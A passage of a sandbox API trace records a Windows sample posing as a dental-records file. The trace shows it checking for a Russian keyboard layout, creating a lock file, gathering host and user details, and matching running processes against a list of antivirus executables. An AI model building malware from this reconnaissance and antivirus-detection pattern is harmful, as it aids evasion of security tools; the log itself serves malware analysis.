szExeFile="habitat norman cognitive.exe")) returned 1 [0036.078] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mars_shortly_joins_spell.exe")) returned 1 [0036.078] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="closer_ban.exe")) returned 1 [0036.079] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="figured.exe")) returned 1 [0036.081] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="extraordinarynasdaq.exe")) returned 1 [0036.082] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="gossip_vocal_outlet_publication.exe")) returned 1 [0036.083] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="advantages_muscle.exe")) returned 1 [0036.084] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="reserve-springfield.exe")) returned 1 [0036.085] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="regardless dk chester theft.exe")) returned 1 [0036.086] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="havebuyers.exe")) returned 1 [0036.087] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="discuss band trucks.exe")) returned 1 [0036.088] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="honey.exe")) returned 1 [0036.088] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="minimal.exe")) returned 1 [0036.089] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="declarationrj.exe")) returned 1 [0036.090] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="prison_mountains_vienna.exe")) returned 1 [0036.091] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="turtle.exe")) returned 1 [0036.092] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="politicalinterestboom.exe")) returned 1 [0036.092] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0036.093] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.093] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0036.094] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.094] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.095] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.096] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Jeremy Witt's Dental Records.exe")) returned 1 [0036.096] Process32NextW (in: hSnapshot=0x180, lppe=0xe10000 | out: lppe=0xe10000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x5dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Jeremy Witt's Dental Records.exe")) returned 0 [0036.097] VirtualFree (lpAddress=0xe10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.097] CloseHandle (hObject=0x180) returned 1 [0036.097] GetCommandLineA () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\Jeremy Witt's Dental Records.exe\" " [0036.097] OpenProcess (dwDesiredAccess=0x0, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0036.097] GetLastError () returned 0x57 [0036.097] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0xe10000 [0036.097] wsprintfW (in: param_1=0xe10000, param_2="%d" | out: param_1="1") returned 1 [0036.098] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf738 | out: phkResult=0xdcf738*=0x188) returned 0x0 [0036.098] RegQueryValueExW (in: hKey=0x188, lpValueName="1", lpReserved=0x0, lpType=0x0, lpData=0xe1000e, lpcbData=0xdcf730*=0x80 | out: lpType=0x0, lpData=0xe1000e*=0x30, lpcbData=0xdcf730*=0x12) returned 0x0 [0036.098] RegCloseKey (hKey=0x188) returned 0x0 [0036.098] lstrcmpiW (lpString1="00000409", lpString2="00000419") returned -1 [0036.098] wsprintfW (in: param_1=0xe10000, param_2="%d" | out: param_1="2") returned 1 [0036.098] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf738 | out: phkResult=0xdcf738*=0x188) returned 0x0 [0036.098] RegQueryValueExW (in: hKey=0x188, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xe1000e, lpcbData=0xdcf730*=0x80 | out: lpType=0x0, lpData=0xe1000e*=0x30, lpcbData=0xdcf730*=0x80) returned 0x2 [0036.098] GetLastError () returned 0x57 [0036.098] RegCloseKey (hKey=0x188) returned 0x0 [0036.098] wsprintfW (in: param_1=0xe10000, param_2="%d" | out: param_1="3") returned 1 [0036.098] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf738 | out: phkResult=0xdcf738*=0x188) returned 0x0 [0036.098] RegQueryValueExW (in: hKey=0x188, lpValueName="3", lpReserved=0x0, lpType=0x0, lpData=0xe1000e, lpcbData=0xdcf730*=0x80 | out: lpType=0x0, lpData=0xe1000e*=0x30, lpcbData=0xdcf730*=0x80) returned 0x2 [0036.098] GetLastError () returned 0x57 [0036.098] RegCloseKey (hKey=0x188) returned 0x0 [0036.098] wsprintfW (in: param_1=0xe10000, param_2="%d" | out: param_1="4") returned 1 [0036.098] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf738 | out: phkResult=0xdcf738*=0x188) returned 0x0 [0036.098] RegQueryValueExW (in: hKey=0x188, lpValueName="4", lpReserved=0x0, lpType=0x0, lpData=0xe1000e, lpcbData=0xdcf730*=0x80 | out: lpType=0x0, lpData=0xe1000e*=0x30, lpcbData=0xdcf730*=0x80) returned 0x2 [0036.098] GetLastError () returned 0x57 [0036.098] RegCloseKey (hKey=0x188) returned 0x0 [0036.098] wsprintfW (in: param_1=0xe10000, param_2="%d" | out: param_1="5") returned 1 [0036.098] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf738 | out: phkResult=0xdcf738*=0x188) returned 0x0 [0036.099] RegQueryValueExW (in: hKey=0x188, lpValueName="5", lpReserved=0x0, lpType=0x0, lpData=0xe1000e, lpcbData=0xdcf730*=0x80 | out: lpType=0x0, lpData=0xe1000e*=0x30, lpcbData=0xdcf730*=0x80) returned 0x2 [0036.099] GetLastError () returned 0x57 [0036.099] RegCloseKey (hKey=0x188) returned 0x0 [0036.099] wsprintfW (in: param_1=0xe10000, param_2="%d" | out: param_1="6") returned 1 [0036.099] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf738 | out: phkResult=0xdcf738*=0x188) returned 0x0 [0036.099] RegQueryValueExW (in: hKey=0x188, lpValueName="6", lpReserved=0x0, lpType=0x0, lpData=0xe1000e, lpcbData=0xdcf730*=0x80 | out: lpType=0x0, lpData=0xe1000e*=0x30, lpcbData=0xdcf730*=0x80) returned 0x2 [0036.099] GetLastError () returned 0x57 [0036.099] RegCloseKey (hKey=0x188) returned 0x0 [0036.099] wsprintfW (in: param_1=0xe10000, param_2="%d" | out: param_1="7") returned 1 [0036.099] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf738 | out: phkResult=0xdcf738*=0x188) returned 0x0 [0036.099] RegQueryValueExW (in: hKey=0x188, lpValueName="7", lpReserved=0x0, lpType=0x0, lpData=0xe1000e, lpcbData=0xdcf730*=0x80 | out: lpType=0x0, lpData=0xe1000e*=0x30, lpcbData=0xdcf730*=0x80) returned 0x2 [0036.099] GetLastError () returned 0x57 [0036.099] RegCloseKey (hKey=0x188) returned 0x0 [0036.099] wsprintfW (in: param_1=0xe10000, param_2="%d" | out: param_1="8") returned 1 [0036.099] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf738 | out: phkResult=0xdcf738*=0x188) returned 0x0 [0036.099] RegQueryValueExW (in: hKey=0x188, lpValueName="8", lpReserved=0x0, lpType=0x0, lpData=0xe1000e, lpcbData=0xdcf730*=0x80 | out: lpType=0x0, lpData=0xe1000e*=0x30, lpcbData=0xdcf730*=0x80) returned 0x2 [0036.099] GetLastError () returned 0x57 [0036.099] RegCloseKey (hKey=0x188) returned 0x0 [0036.099] VirtualFree (lpAddress=0xe1000e, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.099] GetUserDefaultUILanguage () returned 0x409 [0036.099] GetSystemDefaultUILanguage () returned 0x409 [0036.099] VirtualAlloc (lpAddress=0x0, dwSize=0x404, flAllocationType=0x3000, flProtect=0x4) returned 0xe10000 [0036.100] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0xe10200, csidl=35, fCreate=1 | out: pszPath="C:\\ProgramData") returned 1 [0036.104] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0xf40000 [0036.104] GetWindowsDirectoryW (in: lpBuffer=0xf40000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0036.104] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xf40200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0xf40600, lpMaximumComponentLength=0xf40608, lpFileSystemFlags=0xf40604, lpFileSystemNameBuffer=0xf40400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xf40600*=0xd2ca4def, lpMaximumComponentLength=0xf40608*=0xff, lpFileSystemFlags=0xf40604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0036.105] wsprintfW (in: param_1=0xe10000, param_2="%s\\%X.lock" | out: param_1="C:\\ProgramData\\696526F7.lock") returned 28 [0036.105] CreateFileW (lpFileName="C:\\ProgramData\\696526F7.lock" (normalized: "c:\\programdata\\696526f7.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x18c [0036.107] VirtualFree (lpAddress=0xf40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.107] VirtualFree (lpAddress=0xe10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.108] VirtualAlloc (lpAddress=0x0, dwSize=0x114, flAllocationType=0x3000, flProtect=0x4) returned 0xe10000 [0036.109] VirtualAlloc (lpAddress=0x0, dwSize=0x202, flAllocationType=0x3000, flProtect=0x4) returned 0xf40000 [0036.109] GetUserNameW (in: lpBuffer=0xf40000, pcbBuffer=0xdcf72c | out: lpBuffer="CIiHmnxMn6Ps", pcbBuffer=0xdcf72c) returned 1 [0036.113] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0xf50000 [0036.113] GetComputerNameW (in: lpBuffer=0xf50000, nSize=0xdcf72c | out: lpBuffer="LHNIWSJ", nSize=0xdcf72c) returned 1 [0036.114] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x12f0000 [0036.114] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf688 | out: phkResult=0xdcf688*=0x1ac) returned 0x0 [0036.114] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Domain", lpReserved=0x0, lpType=0x0, lpData=0x12f0000, lpcbData=0xdcf698*=0x80 | out: lpType=0x0, lpData=0x12f0000*=0x0, lpcbData=0xdcf698*=0x2) returned 0x0 [0036.114] RegCloseKey (hKey=0x1ac) returned 0x0 [0036.114] wsprintfW (in: param_1=0x12f0000, param_2="WORKGROUP" | out: param_1="WORKGROUP") returned 9 [0036.114] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1300000 [0036.114] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\International", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf688 | out: phkResult=0xdcf688*=0x1ac) returned 0x0 [0036.115] RegQueryValueExW (in: hKey=0x1ac, lpValueName="LocaleName", lpReserved=0x0, lpType=0x0, lpData=0x1300000, lpcbData=0xdcf698*=0x40 | out: lpType=0x0, lpData=0x1300000*=0x65, lpcbData=0xdcf698*=0xc) returned 0x0 [0036.115] RegCloseKey (hKey=0x1ac) returned 0x0 [0036.115] VirtualAlloc (lpAddress=0x0, dwSize=0x8a, flAllocationType=0x3000, flProtect=0x4) returned 0x1310000 [0036.115] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x1320000 [0036.115] wsprintfW (in: param_1=0x1310000, param_2="%d" | out: param_1="1") returned 1 [0036.115] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf688 | out: phkResult=0xdcf688*=0x1ac) returned 0x0 [0036.115] RegQueryValueExW (in: hKey=0x1ac, lpValueName="1", lpReserved=0x0, lpType=0x0, lpData=0x131000e, lpcbData=0xdcf698*=0x80 | out: lpType=0x0, lpData=0x131000e*=0x30, lpcbData=0xdcf698*=0x12) returned 0x0 [0036.115] RegCloseKey (hKey=0x1ac) returned 0x0 [0036.116] lstrcmpiW (lpString1="00000409", lpString2="00000419") returned -1 [0036.116] wsprintfW (in: param_1=0x1310000, param_2="%d" | out: param_1="2") returned 1 [0036.116] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf688 | out: phkResult=0xdcf688*=0x1ac) returned 0x0 [0036.116] RegQueryValueExW (in: hKey=0x1ac, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0x131000e, lpcbData=0xdcf698*=0x80 | out: lpType=0x0, lpData=0x131000e*=0x30, lpcbData=0xdcf698*=0x80) returned 0x2 [0036.116] GetLastError () returned 0xcb [0036.116] RegCloseKey (hKey=0x1ac) returned 0x0 [0036.116] wsprintfW (in: param_1=0x1320000, param_2="0" | out: param_1="0") returned 1 [0036.116] VirtualFree (lpAddress=0x1310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0036.117] VirtualAlloc (lpAddress=0x0, dwSize=0x82, flAllocationType=0x3000, flProtect=0x4) returned 0x1310000 [0036.117] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0xdcf688 | out: phkResult=0xdcf688*=0x1ac) returned 0x0 [0036.117] RegQueryValueExW (in: hKey=0x1ac, lpValueName="productName", lpReserved=0x0, lpType=0x0, lpData=0x1310000, lpcbData=0xdcf698*=0x80 | out: lpType=0x0, lpData=0x1310000*=0x57, lpcbData=0xdcf698*=0x1e) returned 0x0 [0036.118] RegCloseKey (hKey=0x1ac) returned 0x0 [0036.118] GetNativeSystemInfo (in: lpSystemInfo=0xdcf6f4 | out: lpSystemInfo=0xdcf6f4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0036.118] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x1330000 [0036.118] wsprintfW (in: param_1=0x1330000, param_2="x64" | out: param_1="x64") returned 3 [0036.118] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2d20000 [0036.119] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2d30000 [0036.119] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ac [0036.130] Process32FirstW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0036.131] lstrcmpiW (lpString1="AVP.EXE", lpString2="[System Process]") returned 1 [0036.131] lstrcmpiW (lpString1="ekrn.exe", lpString2="[System Process]") returned 1 [0036.131] lstrcmpiW (lpString1="avgnt.exe", lpString2="[System Process]") returned 1 [0036.131] lstrcmpiW (lpString1="ashDisp.exe", lpString2="[System Process]") returned 1 [0036.131] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="[System Process]") returned 1 [0036.131] lstrcmpiW (lpString1="Mcshield.exe", lpString2="[System Process]") returned 1 [0036.131] lstrcmpiW (lpString1="avengine.exe", lpString2="[System Process]") returned 1 [0036.131] lstrcmpiW (lpString1="cmdagent.exe", lpString2="[System Process]") returned 1 [0036.131] lstrcmpiW (lpString1="smc.exe", lpString2="[System Process]") returned 1 [0036.131] lstrcmpiW (lpString1="persfw.exe", lpString2="[System Process]") returned 1 [0036.131] lstrcmpiW (lpString1="pccpfw.exe", lpString2="[System Process]") returned 1 [0036.131] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="[System Process]") returned 1 [0036.131] lstrcmpiW (lpString1="cfp.exe", lpString2="[System Process]") returned 1 [0036.131] lstrcmpiW (lpString1="msmpeng.exe", lpString2="[System Process]") returned 1 [0036.131] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x64, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0036.132] GetLastError () returned 0xcb [0036.132] lstrcmpiW (lpString1="AVP.EXE", lpString2="System") returned -1 [0036.132] lstrcmpiW (lpString1="ekrn.exe", lpString2="System") returned -1 [0036.132] lstrcmpiW (lpString1="avgnt.exe", lpString2="System") returned -1 [0036.132] lstrcmpiW (lpString1="ashDisp.exe", lpString2="System") returned -1 [0036.132] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="System") returned -1 [0036.132] lstrcmpiW (lpString1="Mcshield.exe", lpString2="System") returned -1 [0036.132] lstrcmpiW (lpString1="avengine.exe", lpString2="System") returned -1 [0036.132] lstrcmpiW (lpString1="cmdagent.exe", lpString2="System") returned -1 [0036.132] lstrcmpiW (lpString1="smc.exe", lpString2="System") returned -1 [0036.132] lstrcmpiW (lpString1="persfw.exe", lpString2="System") returned -1 [0036.132] lstrcmpiW (lpString1="pccpfw.exe", lpString2="System") returned -1 [0036.132] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="System") returned -1 [0036.132] lstrcmpiW (lpString1="cfp.exe", lpString2="System") returned -1 [0036.132] lstrcmpiW (lpString1="msmpeng.exe", lpString2="System") returned -1 [0036.132] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0036.133] GetLastError () returned 0xcb [0036.133] lstrcmpiW (lpString1="AVP.EXE", lpString2="smss.exe") returned -1 [0036.133] lstrcmpiW (lpString1="ekrn.exe", lpString2="smss.exe") returned -1 [0036.133] lstrcmpiW (lpString1="avgnt.exe", lpString2="smss.exe") returned -1 [0036.133] lstrcmpiW (lpString1="ashDisp.exe", lpString2="smss.exe") returned -1 [0036.133] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="smss.exe") returned -1 [0036.133] lstrcmpiW (lpString1="Mcshield.exe", lpString2="smss.exe") returned -1 [0036.133] lstrcmpiW (lpString1="avengine.exe", lpString2="smss.exe") returned -1 [0036.133] lstrcmpiW (lpString1="cmdagent.exe", lpString2="smss.exe") returned -1 [0036.133] lstrcmpiW (lpString1="smc.exe", lpString2="smss.exe") returned -1 [0036.133] lstrcmpiW (lpString1="persfw.exe", lpString2="smss.exe") returned -1 [0036.133] lstrcmpiW (lpString1="pccpfw.exe", lpString2="smss.exe") returned -1 [0036.133] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="smss.exe") returned -1 [0036.133] lstrcmpiW (lpString1="cfp.exe", lpString2="smss.exe") returned -1 [0036.133] lstrcmpiW (lpString1="msmpeng.exe", lpString2="smss.exe") returned -1 [0036.133] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0036.134] GetLastError () returned 0xcb [0036.134] lstrcmpiW (lpString1="AVP.EXE", lpString2="csrss.exe") returned -1 [0036.134] lstrcmpiW (lpString1="ekrn.exe", lpString2="csrss.exe") returned 1 [0036.134] lstrcmpiW (lpString1="avgnt.exe", lpString2="csrss.exe") returned -1 [0036.134] lstrcmpiW (lpString1="ashDisp.exe", lpString2="csrss.exe") returned -1 [0036.134] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="csrss.exe") returned 1 [0036.134] lstrcmpiW (lpString1="Mcshield.exe", lpString2="csrss.exe") returned 1 [0036.134] lstrcmpiW (lpString1="avengine.exe", lpString2="csrss.exe") returned -1 [0036.134] lstrcmpiW (lpString1="cmdagent.exe", lpString2="csrss.exe") returned -1 [0036.134] lstrcmpiW (lpString1="smc.exe", lpString2="csrss.exe") returned 1 [0036.134] lstrcmpiW (lpString1="persfw.exe", lpString2="csrss.exe") returned 1 [0036.134] lstrcmpiW (lpString1="pccpfw.exe", lpString2="csrss.exe") returned 1 [0036.134] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="csrss.exe") returned 1 [0036.134] lstrcmpiW (lpString1="cfp.exe", lpString2="csrss.exe") returned -1 [0036.134] lstrcmpiW (lpString1="msmpeng.exe", lpString2="csrss.exe") returned 1 [0036.134] Process32NextW (in: hSnapshot=0x1ac, lppe=0x2d30000 | out: lppe=0x2d30000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0036.134] GetLastError () returned 0xcb [0036.135] lstrcmpiW (lpString1="AVP.EXE", lpString2="wininit.exe") returned -1 [0036.135] lstrcmpiW (lpString1="ekrn.exe", lpString2="wininit.exe") returned -1 [0036.135] lstrcmpiW (lpString1="avgnt.exe", lpString2="wininit.exe") returned -1 [0036.135] lstrcmpiW (lpString1="ashDisp.exe", lpString2="wininit.exe") returned -1 [0036.135] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="wininit.exe") returned -1 [0036.135] lstrcmpiW (lpString1="Mcshield.exe", lpString2="wininit.exe") returned -1 [0036.135] lstrcmpiW (lpString1="avengine.exe", lpString2="wininit.exe") returned -1 [0036.135] lstrcmpiW (lpString1="cmdagent.exe", 